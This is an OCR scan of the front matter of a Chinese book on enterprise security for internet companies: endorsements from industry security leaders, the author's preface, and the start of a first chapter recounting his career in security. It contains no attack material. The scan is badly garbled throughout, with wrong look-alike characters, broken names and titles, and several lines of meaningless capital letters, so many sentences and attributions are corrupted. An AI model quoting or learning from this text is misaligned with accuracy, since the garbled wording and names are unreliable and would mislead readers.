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本 书 是 安全 大 V 们 多 年 安全 从 业经 验 的 精华 凝聚 ， 是 互联 网 企业 
安全 从 业 人 员 的 必 读 经 典 。 


陈 建 ， 平 安 集 团 信息 安全 资深 总 监 


长 期 以 来 ， 系 统 而 全 面 讲述 互联 网 企业 安全 的 文章 都 极 少 ， 图 书 
吕 更 少 了 。 目 前 大 多 数 文字 内 容 征 描述 各 种 攻防 细节 、 攻 击 技巧 ， 或 
者 是 理论 味道 十 足 、 高 大 上 无 比 的 安全 体系 以 构 理论 ; 不 是 缺乏 企业 
安全 整体 架构 以 点 代 面 ， 就 是 缺乏 企业 实际 场景 难以 落地 。 对 于 互联 


网 企业 安全 管理 者 而 言 ， 最 有 价值 的 并 不 是 具体 的 攻防 技巧 ， 也 不 是 
那 坚 安全 理论 标准 ， 而 是 一 套 可 落地 、 低 成 本 、 行 之 有 效 的 最 佳 实 


践 。 本 书 作者 凭借 在 甲 方 和 乙方 十 多 年 措 抱 深 打 的 实际 经 给， 梳理 出 
了 这 样 一 套 满 满 都 是 经 验 的 互联 网 企业 安全 建设 最 佳 实践 ， 帮 助 企业 
进行 安全 建设 时 少 走 区 路 ， 少 人 花 免 枉 钱 ， 帮 助 想 往 企业 安全 方 同 发 展 
的 专业 人 十 拓宽 思路 ， 完 整 视野 ， 丰 定 经 验 ;， 帮 助 CSO 们 归纳 总 结 ， 
审视 发 展 。 


BRIE (cy07) ， 小 米 CSO 


互联 网 甲 方 所 面临 的 安全 挑战 ， 是 与 传统 企业 完全 不 同 的 。 甲 方 
和 乙方 ,攻击 和 防守 ， 角 色 转 换 并 不 容易 。 本 书 内 容 翔实 ， 对 有 志 参 
与 互联 网 企业 安全 建设 的 人 士 来 说 ， 是 一 本 必 备 宝典 。 


CoolQ， 阿 里 巴巴 安全 部 资深 安全 专家 


大 部 分 IT 管理 者 思想 上 很 重视 安全 ， 但 是 缺少 安全 管理 理念 和 执 
行 ， 因 为 大 家 都 没有 一 个 正确 的 安全 观 ， 或 者 说 安全 体系 概念 ， 不 知 
道 怎 么 去 落地 执行 。 本 书 作 者 赵 户 在 甲 方 和 乙方 都 每 过 ， 他 的 眼界 是 
叮 以 覆盖 到 更 多 的 安全 层面 ， 这 本 书 很 好 地 从 多 个 视角 曾 述 了 安全 体 
系 的 架构 ， 并 且 已 经 给 出 了 执行 步 又 ， 和 希望 对 你 的 企业 有 用 。 


罕 靖 ， 运 维 帮 创始 人 


甲 方 安全 工作 知 不 易 ， 行 更 难 ， 本 书 结合 多 位 业界 顶尖 安全 专家 
的 经 验 从 管理 和 技术 维度 全 面 深入 剖析 了 甲 方 安全 的 场景 ， 是 企业 安 
全 相关 从 业 人 员 的 通关 秘籍 。 


— 方 勇 ，UCloud 安 全 中 心 总 监 
很 高 兴 看 到 赵 彦 等 同学 的 大 作 问 世 ， 本 书 没 有 高 深 的 理论 知识 ， 
没有 高 大 上 的 概念 ， 全 部 内 容 来 目 十 几 年 的 实战 经 验 和 思考 总 结 ， 相 


信 可 以 给 在 互联 网 企业 从 事 安 全 相关 工作 的 同学 提供 全 面 、 系 统 、 接 
地 气 的 指导 和 帮助 。 


大 型 互联 网 企业 的 在 线 业 务 在 触 达 了 全 网 用 户 的 同时 也 给 所 有 攻 
击 者 桑 露 了 攻击 面 ， 且 攻击 者 又 拥有 近 卑 海量 的 资产 ， 量 变 引 起 质 
变 ， 企 业 的 安全 防护 问题 早已 不 仅仅 古 技 术 问 题 ， 更 多 的 十 工程 和 管 
理 问 题 。 如 何 做 好 这 里 的 工作 ， 是 令 人 头疼 的 事情 。 更 为 遗憾 的 是 ， 
目前 市 面 上 的 信息 安全 类 书籍 要 么 是 讲 具 体 茶 类 安全 技术 ， 要 么 束 是 
放 之 四 海 而 丝 准 却 又 无 法 落地 的 理论 指导 ， 很 少 有 理论 结合 企业 实际 
工作 情况 的 探讨 ， 这 本 书 的 出 版 弥补 了 这 个 遗憾 。 本 书 作者 赵 户 古 安 
全 图 老 前 辜 ， 在 甲 方 乙方 都 工作 过 ， 有 丰富 的 经 验 ， 江 虎 过 去 有 五 年 
时 间 是 我 的 同事 ， 为 腾讯 的 安全 体系 建设 做 出 了 重要 页 献 。 本 书 从 理 
论 、 技 术 、 实 践 三 个 部 分 入 手 ， 基 本 涵盖 了 互联 网 企业 安全 的 方 方 面 
面 ， 是 企业 安全 人 员 的 案头 必 备 参考 书籍 。 强 力 推荐 。 


#34) (lake2) ， 腾 讯 安全 平台 部 总 监 


一 直 在 互联 网 公司 从 事 互 联网 安全 攻防 的 工作 ， 在 这 个 过 程 中 也 
一 直 壬 试 寻找 一 些 相 对 稳定 的 答案 。 本 书 的 价值 不 仅 在 于 手把手 告诉 
你 网 络 安全 怎么 做 ， 业 务 安全 怎么 做 ， 系 统 攻防 怎么 做 ， 昌 然 书 中 在 
这 方面 也 有 足够 精 到 的 论述 ， 它 的 价值 更 在 于 让 你 深 处 一 个 纷繁 复 
杂 、 日 狐 月 异 的 互联 网 大 环境 中 ， 从 外 部 到 内 部 、 从 宏观 到 微观 多 重 
视角 去 思考 你 所 服务 企业 的 信息 安全 的 方方面面 ， 让 你 理解 你 的 企业 
当前 处 于 什么 样 的 安全 位 置 ， 并 运用 恰当 的 方法 论 、 安 全 管理 手段 和 


安全 技术 ， 找 到 属于 你 服务 企业 的 答案 。 这 本 书 征 我 见 过 的 国内 第 一 
本 系统 化 剖析 整个 互联 网 企业 安全 的 书籍 ， 如 果 早 几 年 出 现 这 样 的 书 
籍 ， 一 定 可 以 让 我 少 走 几 年 弯路 ， 期 待 这 本 书 能 够 让 更 多 的 安全 同行 
早日 找到 属于 目 己 的 答案 。 


本 书 是 少见 的 横贯 信息 安全 “ 南 ”“ 北 ”之 作 ， 并 且 十 分 难得 地 分 至 
了 互联 网 公司 安全 实践 的 经 验 ， 不 论 是 从 事 “ 传 统 安 全 ”还 是 “互联 网 安 
全 ”， 均 值得 一 读 。 同 时 ， 本 书包 括 的 内 容 也 相当 丰富 、 全 面 ， 沐 盖 了 
从 组 织 建立 、 建 设 方法 论 、 原 则 直至 具体 实践 ， 不 论 古 希望 加 入 信息 
安全 行业 的 爱好 者 还 是 行业 老兵 ， 都 可 以 从 中 得 到 局 发 。 


一 一 金 湘 于 (NUKE) ， 前 信息 技术 、 信 息 安 全 资深 顾问 ， 现 私募 投 


当今 世界 的 技术 发 展 日 新 月 异 ， 安 全 工作 的 复杂 性 急剧 增高 ， 网 
络 与 信息 安全 事故 层出不穷 ， 大 不 能 有 效应 对 会 给 各 行 各 业 和 广大 用 
尸 带 来 极 大 风险 。 非 常 驻 运 我 所 工作 的 公司 都 对 安全 非常 重视 ， 拥 有 
业 界 的 一 批 安全 精英 ， 华 为 公司 的 安全 专家 赵 户 束 是 其 中 的 出 众 代 
表 ， 他 不 仅 具 有 坚实 的 攻防 基础 和 安全 战略 思维 ， 还 能 够 洞察 传统 安 
全 与 互联 网 安全 的 差异 ， 对 部 门 、 公 司 、 行 业 的 安全 发 展 所 出 有 高 度 
价值 的 建议 。 本 书 内 容 来 源 于 实践 ， 经 过 了 深入 的 分 析 和 提炼 ， 升 华 


成 为 有 益 的 指导 和 参考 ， 相 信人 不论 征 CSO 还 是 刚 入 行 的 从 业者 ， 不 论 
是 安 全 专业 人 员 还 是 想 了 解 安全 的 业务 人 员 ， 都 会 从 本 书 中 获 花 民 


Z o 


—— Mii, Huawei Global Chief Scientist/Technologist (Cyber 
Security) ， 网 络 安全 实验 室 CTO 兼 国际 CSO，CSA 大 中 华 区 主席 ， 


XJTU Fellow/Professor 


终于 看 到 一 本 真正 意义 上 企业 安全 方面 的 书籍 ， 作 者 兼顾 广博 与 
精深 的 专业 功底 ， 横 跨 甲 乙方 、 传 统 安 全 与 互联 网 安全 的 多 个 行业 领 
域 的 视角 与 知识 层次 ， 相 信 每 一 位 读者 都 会 有 所 收获 。 从 攻防 以 外 的 
视角 ， 体 系 化 地 介绍 安全 ， 对 企业 安全 的 负责 人 、 从 业者 以 及 乙方 机 
构 咨询 与 技术 人 员 都 有 很 好 的 实用 指南 作用 。 


一 一 壬 树 鹏 ， 滴 滴 出 行 首席 安全 顾问 


很 高 兴 在 这 个 时 间 看 到 这 样 一 本 书 的 面世 ， 在 试 读 样 章 时 ， 产 生 
了 很 多 的 共鸣 。 企 业 做 安全 很 难 ， 尤 其 是 在 以 开放 和 不 断 变化 者 称 的 
互联 网 领域 尤 甚 。 业 务 形态 的 差异 决定 了 各 个 企业 的 安全 目标 不 尽 相 
同 。* 方 问 错 了 ， 前 进 便 是 倒退 ”。 企业 安全 的 不 同 阶段 如 何 合理 地 设 
定 目标 ， 选 择 切 实 可 行 的 方案 ， 以 及 如 何在 有 限 的 时 间 、 人 力 和 资源 
下 前 行 ， 是 安全 管理 者 们 必须 面 对 的 问题 。 安 全 建设 必然 伴随 着 不 断 
的 取舍 、 权 衡 ， 乃 至 博 穿 。 项 望 阅 读 此 书后 能 让 每 个 安全 人 员 在 大 到 


安全 规划 、 筑 略 制 是， 小 到 每 个 安全 汤 洞 修补 、 策 略 上 线 ， 力 至 安全 
事件 的 应 急 退 查 中 ， 都 能 认 清 目 己 所 做 事情 在 企业 安全 监 图 中 的 位 
置 ， 而 不 是 为 了 做 事 而 做 事 ， 更 好 地 “搞定 ”事情 。 


xi4oyu， 百 度 安 全 实验 室 Xteam 人 负责 人 


相 比 技术 篇 ， 本 书 的 理论 篇 更 加 精彩 。 互 联网 安全 从 业者 最 大 的 
挑战 并 非 技 术 ， 而 是 如 何 建立 正确 的 行业 格局 观 ， 并 且 能 够 与 业务 团 
队 、 安 全 团队 管理 层 、 公 司 管理 层 建 立民 好 的 沟通 机 制 ， 取 得 信任 和 
文 持 。 本 书 的 儿 位 作者 在 互联 网 行业 有 着 丰富 的 安全 管理 和 从 业经 
验 ， 强 烈 推 荐 有 志 于 从 事 互联 网 安全 行业 的 朋友 阅读 。 


一 ” 薛 锋 ， 微 步 在 线 CEO， 原 亚马逊 中 国 CISO 


当今 的 互联 网 对 企业 安全 老大 的 需求 远 远大 过 供给 。 不 客气 的 
ii, MERE SRM NRE ot abe EIST ER, ELSE PIR 
学 习 做 CSO 的 。 有 些 聪明 的 、 注 重 学 习 的 人 ， 到 岗 后 能 逐步 建成 一 只 
有 一 定 实力 并 且 能 逐步 成 长 的 团队 。 男 外 一 些 束 利用 CTO 不 懂 安 全 ， 
靠 一 张嘴 皮子 其 上 了 瞒 下 ， 拉 了 一 票 目 己 人 捅 办 公 室 政治 。 而 真正 有 实 
战 经 验 、 有 创新 力 、 能 系统 性 地 写 这 样 一 本 书 的 极 少数 人 ， 大 都 正 忙 
于 建设 自己 企业 的 安全 团队 或 者 在 创业 路 上 ， 没 有 时 间或 者 没有 动力 
写 。 本 人 曾经 有 幸 在 天国 做 过 互联 网 企业 的 甲 方 和 乙方 ， 并 且 在 三 个 
中 国 互联 网 企业 分 别 从 头 建设 了 三 只 安全 团队 。 虽 然 我 也 动 过 这 个 心 


思 写 本 书 总 结 一 下 经 验 教 训 以 及 中 间 的 有 趣 的 人 和 事 ， 但 也 是 打算 退 
休 以 后 才 做 。 男 外 我 从 市 场 的 角度 考虑 ， 真 正 关 心 这 个 问题 的 人 少 的 
可 怜 ， 写 完了 我 估计 想 看 的 人 也 不 会 多 ， 可 能 最 终 殉 是 个 目 娱 目 乐 受 
了 。 赵 彦 是 这 个 极 少数 的 人 群 中 的 一 个 极 少 数 派 ， 居 然 现 在 器 有 时 间 
有 兴趣 写 出 这 样 一 本 书 出 来 。 当 然 ， 每 个 企业 不 同 ， 每 个 CSO 的 思想 
方法 不 同 ， 这 本 书 里 的 有 些 方法 或 者 说 法 CSO 们 并 不 见得 会 完全 赞 
同 ， 但 是 这 本 书 给 CTO 或 者 准备 当 CSO 的 人 提供 了 一 个 比较 完整 的 视 
角 ， 把 CSO 具 体 都 应 该 解决 什么 问题 讲 清楚 了 ， 而 不 是 以 前 党 统 的 一 
人 句 “ 反 正安 全 出 了 事 忠 都 是 他 负责”。 除了 介绍 问题 以 外 ， 本 书 也 介绍 
了 一 些 系统 方法 帮助 新 上 任 的 CSO 整 理 一 下 总 体 思路 。 总 之 ， 这 是 一 
本 当下 业界 急 缺 的 书 。 


一 一 杨 更 ， 前 小 米 、 美 团 、 亚 马 进 中 国 CSO 


此 书 凝结 了 赵 彦 对 互联 网 企业 安全 体系 建设 的 思考 和 经 验 提 炼 ， 
复 关 了 管理 和 解决 方案 ， 在 宏观 面前 述 了 目 己 的 理解 和 安全 观 ， 对 安 
全 领域 从 业者 是 一 份 很 好 的 参考 资料 。 


一 一 杨 勇 (Coolc) ， 腾 讯 云 副 总 裁 ， 腾 讯 安全 平台 部 负责 人 
干货 ! 是 落地 实践 还 古 纸上谈兵 ， 是 美女 还 是 野兽 ， 作 者 抽 丝 剥 | 
重 、 层 层 展 开 ， 分 译 了 他 们 在 互联 网 企业 安全 领域 中 丰富 的 实战 心 
得 ， 甲 方 和 乙方 都 非常 值得 阅读 参考 。 


— ORETTE, RARA E BOK 


WARS SPOR, KEER ERNE SS ARE 
HEWA, Mx SAT ER E ALA RA BES BL, 
本 书 深入 浅 出 地 介绍 企业 信息 安全 体系 从 建设 到 实施 的 一 套 完 整 过 
程 ， 强 烈 建 并 企业 信息 安全 技术 团队 的 负责 人 部 能 阅读 此 书 ， 一 定 能 
让 你 受益 菲 浅 。 


—— RK (cnhawk) ， 文 付 宝 高 级 安全 专家 


By a 


在 互联 网 + 的 进程 中 ， 一 方面 互联 网 企业 越 来 越 多 ， 另 一 方面 由 
外 部 环境 推动 的 或 自发 的 安全 意识 越 来 越 强 ， 对 安全 建设 的 需求 也 越 
来 越 多 ， 很 多 企业 都 开始 招聘 安全 人 负责 人 ， 不 乏 年 薪 上 百 万 元 和 几 百 
万 元 的 安全 负责 人 职位 ， 但 事实 是 很 多 公司 常年 用 高 新 ， 都 招 不 到 合 

适 的 安全 负责 人 ， 其 中 的 原因 有 很 多 ， 比 较 客 观 的 一 条 就 是 这 个 行业 
所 培养 的 有 互联 网 整体 安全 视角 的 人 实在 寥寥 无 几 ， 而 这 些 人 大 都 不 
缺 高 薪 ， 也 不 缺 职位 。 我 在 “信息 安全 行业 从 业 指 南 2.0” 一 文中 曾经 写 

过 目 2014 年 开始 ， 安 全 行业 的 大 部 分 高 端 人 才 都 在 互联 网 行业 ， 为 什 

么 还 是 有 那么 多 缺口 ? 细 想 了 一 下 有 几 个 方面 的 因素 ; 


过 去 ， 安 全 并 不 太 受 重视 ， 安 全 从 业者 的 职业 发 展 瓶 贷 明显 ， 很 
多 拥有 整体 安全 视角 的 人 离开 了 安全 行业 转 去 做 其 他 的 事情 了 。 


早年 在 乙方 安全 公司 的 人 经 历 了 给 客户 从 零 开始 建设 安全 体系 的 
过 程 ， 而 后 来 进入 乙方 的 毕业 生 ， 接 触 客户 时 大 都 已 经 有 安全 体系 ， 
无 法 体验 从 0 到 1 的 过 程 并 从 中 学 到 完整 的 方法 论 ， 很 多 方法 论 甚 至 
已 “失传 ”， 有 些 方 法 论 原 本 束 只 集中 在 公司 总 部 的 一 轿 人 手 里 ， 分 文 
机 构 除 了 文档 得 不 到 “大 象 ”。 


BAT 这 类 企业 安全 也 早已 经 过 安全 建设 期 ， 后 来 者 分 工 很 细 ， 除 
了 几 个 早已 身 居 总 监 职位 的 老 员 工 之 外 ， 大 多 数 人 无 法 得 知 安全 体系 
的 全 和 够 ， 很 多 人 离开 了 BAT 也 说 不 清 目 己 责任 之 外 的 事情 该 怎么 做 。 


二 三 线 互 联网 企业 中 ， 很 多 团队 所 持 有 的 安全 体系 并 不 完整 ， 也 
不 是 业内 最 佳 实践 ， 有 些 甚 至 就 古 救 火 型 团队 ， 更 难 有 体系 化 的 积 
Bo 


当下 的 很 多 乙方 安全 公司 ， 在 互联 网 大 潮 的 冲击 下 也 面临 着 转型 
的 挑战 ， 要 提供 符合 时 代 趋 势 的 解决 方案 仍 需 努力 。 


在 社区 ， 目 前 大 家 都 热 圳 攻防 ， 而 不 是 企业 安全 建设 。 攻 击 者 、 
乙方 、 甲 方 之 间 仍 然 存 在 较 大 的 鸿沟 ， 彼 此 互相 不 导 ， 从 社区 里 也 多 
半 只 能 挖掘 到 一 些 单 点 型 的 防御 手法 ， 即 便 好 学 的 人 订阅 了 所 有 的 安 
全 站 点 和 微 信 公 众 号 ， 娩 怕 也 难以 学 会 企业 整体 安全 建设 的 方法 。 


基于 以 上 种 种 原因 ， 我 明显 感觉 到 有 一 堵 墙 存在 于 业界 、 社 区、 
甲 方 、 乙 方 、 想 学 习 的 人 和 信息 的 不 对 称 之 间 ， 我 决定 动手 推倒 这 墙 
Hi, MARA TIAE -° 


首先 本 书 聚 焦 于 互联 网 行业 的 企业 级 安全 解决 方案 、 架 构 、 方 法 
论 和 建设 思路 ， 关 于 单 点 技术 ， 市 面 上 已 经 有 很 多 书 ， 所 以 本 书 内 容 
大 多 不 会 围绕 单 点 技术 来 讲 ， 而 是 布 望 读 者 看 完 之 后 找到 企业 安全 整 
体 建设 的 那 种 感觉 。 即 便 征 一 个 甲 方 安全 工程 师 ， 也 能 从 中 学 到 互联 


网 公司 安全 负责 人 的 知识 和 视野 ， 并 以 此 为 导航 ， 逐 步 积累 目 己 所 需 
要 的 知识 和 技能 ， 问 更 高 的 层级 发 展 。 


对 于 乙方 安全 公司 的 从 业者 而 言 ， 顾 问 们 或 许可 以 从 中 了 解 甲 方 
的 需求 和 工作 ， 从 而 提供 更 加 接地 气 的 交付 方案 。 对 于 产品 设计 和 人 研 
发 人 员 ， 本 书展 示 的 互联 网 安全 架构 有 助 于 拓展 传统 安全 的 思路 ， 不 
一 定 能 直接 复 用 ， 但 也 许 能 有 所 局 发 。 


对 于 黑客 技术 爱好 者 ， 比 较 安 全 的 道路 仍然 是 从 事 安 全 ， 不 可 避 
免 地 也 要 学 习 这 些 ， 高 级 的 渗透 和 攻击 技巧 都 需要 组 过 防御 手段 ， 了 
解 防御 者 思维 是 必须 跨 过 的 门槛 。 


本 书 同样 适用 于 想 了 解 企业 安全 建设 的 CTO、 运 维 总 监 、 全 发 总 
监 、 架 构 师 。 但 本 书 内 容 都 假设 读者 有 一 定 的 基础 ， 对 一 些 比 较 基础 
的 名 词 和 技术 没有 做 太 多 的 解释 。 


在 出 版 这 本 书 时 由 于 时 间 和 信息 披露 方面 的 限制 ， 写 出 来 的 部 分 
与 我 们 原先 期 望 的 仍 有 不 少 产 距 ， 但 另 一 方面 我 们 硕 望 像 互联 网 产品 
的 迁 代 方式 一 样 ， 不 追求 完美 ， 但 求 尽快 面世 ， 因 此 本 书 也 难免 带 着 
各 种 bug 上 线 ， 也 欢迎 各 位 读者 的 意见 或 建议 。 此 外 ， 我 们 计划 在 本 书 
的 第 2 版 中 进一步 展开 某 些 话题 ， 并 且 更 加 系统 化 ， 同 时 会 在 业界 最 佳 
实践 方面 挑战 男 一 个 维度 。 


最 后 特别 感谢 本 书 的 编辑 吴 怡 自我 在 360 工 作 时 便 找 到 我 ， 建 议 我 
将 网 络 中 的 文字 写成 书 ， 让 更 多 的 人 能 读 到 。 感 谢 另 外 两 位 作者 江 虎 
(ID: xti9er) MHIE (ID: Rayxcp) 帮 有 我 分 担 了 很 多 压力 ， 使 得 此 
书 能 尽快 面世 。 同 时 感谢 netxfly@ 小 米 、 职 业 欠 钱 @ 腾 讯 、dlyde@ 电 
言 云 堤 、 终 极 修炼 师 @ 唯 品 会 、laintoday@ 爱 奇 艺 提供 的 帮助 。 


理论 篇 
安全 大 环境 与 背景 
安全 的 组 织 
甲 方 安全 建设 方法 论 


业界 的 模糊 地 市 


第 1 章 REARS 


如 果 从 一 个 很 微观 的 角度 切入 企业 安全 这 个 话题 ， 那 么 大 多 数 人 
会 像 一 叶 孤 髓 跌 进 大 海 茫 范 然 找 不 到 方向 ， 所 以 本 章 从 安全 领域 整体 
环境 入 手 ， 以 便于 读者 找到 系统 性 的 那 种 感觉 。 尽 管 笔 者 没有 致力 于 
提供 关于 企业 安全 的 一 个 非常 完整 的 "上 帝 视 角 ”， 但 也 尽 可 能 地 兼顾 
了 这 方面 的 需求 。 


11 切入 “企业 安全 ”的 视角 


目前 安全 行业 中 “二 进 制 * 和 “脚本 ”流派 广为人知 ， 虽 然 他 们 是 安 
全 行业 的 主力 军 ， 但 除了 微观 对 抗 之 外 ， 安 全 是 一 个 很 大 的 工程 ， 比 
如 企业 安全 管理 ， 实 际 上 并 不 属于 上 述 两 类 。 确 切 来 说 ， 应 归 入 男 外 
一 个 群体 : CSOs， 加 了 s 表 示 他 们 是 一 个 群体 ， 这 个 群体 从 生态 链 的 
顶端 联接 着 绝 大 多 数 从 业者 和 安全 厂商 。 在 这 个 描述 中 我 并 没有 发 明 
新 的 名 词 ， 没 有 新 建 一 个 诸如 气 守 剑 、 宗 这 样 的 词 ， 只 十 在 知识 结构 
和 职业 背景 上 做 一 定 的 区 分 ， 用 于 后 续 对 这 本 书 的 扩展 。 


企业 安全 十 不 是 发 现 漏洞 然后 修复 漏洞 ， 再 设置 一 下 防火 墙 之 类 
的 工作 ? 假如 你 的 公司 只 有 一 个 产品 、 两 人 台 服 务 器 、3 个 程序 员 ， 我 认 
为 这 个 说 法 不 能 算 错 。 不 过 在 绝 大 多 数 情 况 下 ， 企 业 安全 远 不 止 于 
此 。 渗 透 性 测试 和 对 抗 能 不 能 算 企 业 安 全 ? 在 一 个 过 于 纸上谈兵 的 企 

征 不 错 的 切入 点 ， 不 过 局 部 对 抗 发 生 于 企业 安全 的 各 个 场 
景 中 ， 它 只 能 算是 缩影 ， 不 是 全 够 。 企 业 安 全 是 什么 ? 对 传统 乙方 安 
全 公司 ， 对 新 兴 的 业务 安全 公司 、 移 动 安全 公司 ， 对 甲 方 的 互联 网 公 
司 ， 对 甲 方 的 传统 公司 ， 对 咨询 顾问 ， 对 漏洞 研究 者 ， 对 活跃 于 各 大 
SRC 上 的 日 帽子 们 来 说 ， 诠 释 肯 定 都 不 一 样 。 


先 说 一 下 笔者 的 经 历 ， 以 便 了 解 是 从 什么 角度 来 阐述 这 一 问题 
的 。 学 生 时 代 跟 现在 的 很 多 白 帽 子 一 样 玩 玩 渗 透 ， 玩 玩 二 进 制 ， 在 过 
去 叫 幻影 (Ph4nt0om) 的 组 织 里 认识 了 很 多 大 V， 大 学 毕业 后 即 进 了 绿 
盟 做 渗透 测试 、 安 全 服务 和 咨询 ， 这 是 乙方 中 离 甲 方 安全 最 近 的 职 


位 ， 接 受 了 绿 盟 对 传统 安全 体系 和 方法 论 的 教育 ， 有 些 10 年 前 的 东西 
放 到 今天 看 都 还 会 觉得 完全 不 过 时 。 


现在 的 安全 行业 里 除了 显得 有 些 务 虚 的 安全 理论 之 外 ， 要 么 就是 
一 边 倒 的 攻防 ， 要 么 就 是 过 于 超前 、 浮 在 表面 没有 落地 方案 的 新 概 
念 ， 这 些 声 首 对 企业 安全 实 操 都 缺乏 积极 的 意义 。 有 些 方法 论 是 有 实 
操 意 义 的 ， 并 不 像 攻防 研究 者 声称 的 是 纯 务虚 的 东西 ， 纯 粹 是 位 置 决 
定 想 法 的 问题 。 还 有 些 流 行 的 概念 在 解决 实际 问题 上 的 效 末 有 行 验 
证 ， 并 不 像 市 场 芍 吹 的 那么 好 。 技 术 很 重要 ， 但 攻防 只 解决 了 一 半 问 
题 ， 安 全 的 工程 化 以 及 体系 化 的 安全 染 构 设计 能 力 古 业内 普 直 的 软 
肋 ， 多 数 人 不 擅 此 道 。 对 市 场 上 的 各 种 观点 ， 我 认为 可 能 需要 一 个 相 
对 客观 的 评价 ， 即 某 项 技术 或 管理 在 全 生命 周期 的 各 个 环节 中 ， 在 不 
同 的 行业 、 不 同 的 场景 下 有 什么 样 的 价值 ， 而 不 是 很 随意 地 贴标签 。 
很 多 概念 10 多 年 前 束 有 了 ， 发 明 一 个 新 概念 讲 与 过 去 一 样 的 事情 ， 再 
给 目 己 贴 一 个 发 明 者 的 标签 对 行业 没有 积极 的 意义 。 纵 深 防 御 之 类 的 
概念 在 ISS 没 被 IBM 收 购 之 前 承 有 了 ， 为 什么 现在 有 的 人 觉得 这 个 词 很 
新 ? 因为 过 去 没 重 视 ， 或 者 说 缺少 实践 。 


在 绿 盟 最 大 的 便利 并 不 是 下 班 路 上 随便 都 能 找到 能 聊 exploit 技 术 
的 大 牛 ， 而 是 视野 : 从 金字 塔 视角 看 到 安全 的 整体 解决 方案 ， 宫 括 组 
织 、 管 理 和 技术 3 方面 的 东西 ， 窗 六 全 行业 全 价值 链 过 程 的 技术 方案 ， 
算 上 第 三 方 的 话 几乎 徇 兽 市 面 上 所 有 的 安全 产品 和 解决 方案 。 有 人 看 
到 这 些 会 问 : 这 不 是 传统 安全 那 一 套 吗 ? 且 不 急 ， 本 书后 面 讲 的 都 是 
围绕 互联 网 企业 安全 的 ， 并 不 打 咎 在 传统 安全 上 伦 很 多 篇 幅 ， 只 是 需 
要 区 分 一 下 企业 安全 实际 的 状况 和 某 些 三 商 为 了 兜售 目 己 的 产品 而 宣 
扬 的 概念 是 有 所 不 同 的 ， 大 多 数 厂 丙 痢 会 避 开 目 己 的 弱项 而 在 市 场 活 
动 及 软文 上 专注 地 强调 自己 擅长 的 概念 。 


离开 绿 盟 后 我 去 了 甲 方 ， 一 家 大 型 网 游 公司 ，2008 年 将 近 万 台 的 
物理 服务 器 分 布 于 三 十 多 个 IDC 的 规模 似乎 比 当时 搜狐 全 站 的 IDC 规 模 
还 要 大 一 些 。 跟 现在 一 样 ， 那 时 候 也 是 普 裔 缺少 安全 人 负责 人 的 时 代 ， 
我 也 有 到 组 建 了 一 文 属于 目 己 的 安全 团队 ， 成 为 当时 极 少数 的 安 
监 之 一 。 团 队 中 的 人 现在 裔 布 互 联网 行业 的 半壁 江山 ， 且 都 是 安 
门 独当一面 的 骨干 。 在 这 段 时 间 我 杀 映 经 历 了 从 乙方 到 甲 方 视角 的 过 
渡 ， 从 零 开始 建立 安全 体系 ， 真 正 把 乙方 玩 的 东西 在 一 家 甲 方 公司 落 
地 了 。 我 的 方法 思路 过 程 跟 某 些 互 联网 公司 不 太一 样 ， 因 为 那 时 候 
BAT 的 安全 人 员 大 多 是 毕业 后 直接 去 的 甲 方 ， 一 开始 束 做 甲 方 安全 ， 
而 我 是 从 乙方 到 甲 方 ， 所 以 实践 上 更 多 是 参考 了 乙方 的 方法 论 ， 再 目 
己 措 石头 过 河 ， 除 了 攻防 之 外 ， 多 线 并 行 ， 直 接 建 立 较 完整 的 安全 体 
Be 
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伦 板 。 之 后 跟 在 “信息 安全 的 职业 生涯 "一 文中 所 述 的 那样 ， 我 实践 了 
里 面 所 说 的 最 后 一 跳 ， 做 了 一 家 网 游 公司 的 技术 人 负 贡 人 ， 社 会 俗名 
CTO， 由 安全 转向 全 线 技术 管理 。 说 实话 ， 在 这 段 时 间 里 我 并 不 是 特 
别 重 视 安 全 ， 一 方面 跟 目 己 是 安全 出 身 有 关 ， 必 一 方面 这 确实 是 位 置 
决定 想法 的 事情 ， 不 是 安全 不 重要 ， 而 是 有 很 多 事情 比 安全 更 重要 。 
老实 说 ， 安 全 这 个 事情 跟 金 线 关 系 密切 ， 当 你 有 100 万 元 的 时 候 拿 出 2 
万 元 买 个 保险 箱 凌 它们 你 觉得 值 ， 但 你 只 有 2 万 元 的 时 候 要 拿 出 8 千 元 
天 保险 箱 ， 大 多 数 人 都 会 不 愿意 。 可 参见 我 在 知 乎 上 回答 的 那个 问 
题 : “为 什么 做 安全 一 定 要 去 大 公司 ”。 我 罚 以 为 很 多 公司 的 CEO、 
CTO 对 安全 的 认识 ， 翻 译 过 来 应 该 是 : 被 墨 是 一 件 很 负面 的 事情 ， 所 
以 找 个 人 筹建 团队 打包 了 ， 只 要 不 出 事 束 行 。 他 们 不 是 真 的 认为 安全 
非常 重要 ， 也 不 会 把 安全 当成 一 种 竞争 力 。 现 在 说 这 人 句 话 并 不 是 在 影 
喘 过 去 ， 当 下 国内 很 多 企业 的 观念 仍然 停留 在 这 个 水 平 上 。 


之 后 我 去 360 经 历 了 短暂 的 时 光 ， 再 次 以 乙方 的 身份 拜访 了 企业 级 
客户 ， 很 偶然 地 发 现 大 多 数 乙 方 安全 公司 的 顾问 或 工程 师 其 实 都 没有 
企业 安全 管理 的 真正 经 验 。 虽 不 能 把 这 些 直 接 等 价 于 纸上谈兵 ， 不 过 
确实 是 乙方 的 软肋 。 在 甲 方 企业 高 层 的 眼中 ， 攻 防 这 档 子 事 可 以 等 价 
于 我 论点 钱 让 安全 公司 派 儿 个 工程 师 给 我 做 渗透 测试 然后 修复 漏洞 ， 
不 像 大 型 互联 网 公司 那样 上 升 为 系统 化 和 工程 化 的 日 常 性 活动 。 离 开 
数字 公司 后 ， 我 到 了 全 球 化 的 公司 (华为 ， 从 事 产 品 线 安全 ， 人 负责 


RB: 公有 云 和 终端 云 。 产品 线 安全 属于 甲 方 安全 ， 又 跟 很 多 甲 方 安 
全 不 太一 样 ， 比 传统 意义 上 的 甲 方 安全 介入 得 更 深 ， 履 次 率 更 高 的 

SDLC， 直 接 导 向 产品 设计 的 源头 。 对 绝 大 多 数 甲 方 而 言 ， 你 也 许 在 
用 OS 的 Dep&ASLR， 也 许 在 用 各 种 容器 ， 但 你 很 少 会 目 己 去 发 明 轮 
子 ， 你 也 许 会 自己 造 一 个 WAF 这 样 的 工具 ， 但 你 可 能 很 少 会 像 微 软 那 
样 要 上 自己 去 搞 一 个 EMET 这 种 涉及 安全 机 制 层 面 的 东西 。 但 在 产品 线 
安全 里 ， 这 一 切 都 会 更 进一步 ， 不 只 是 像 互 联网 企业 那样 关注 入 侵 检 
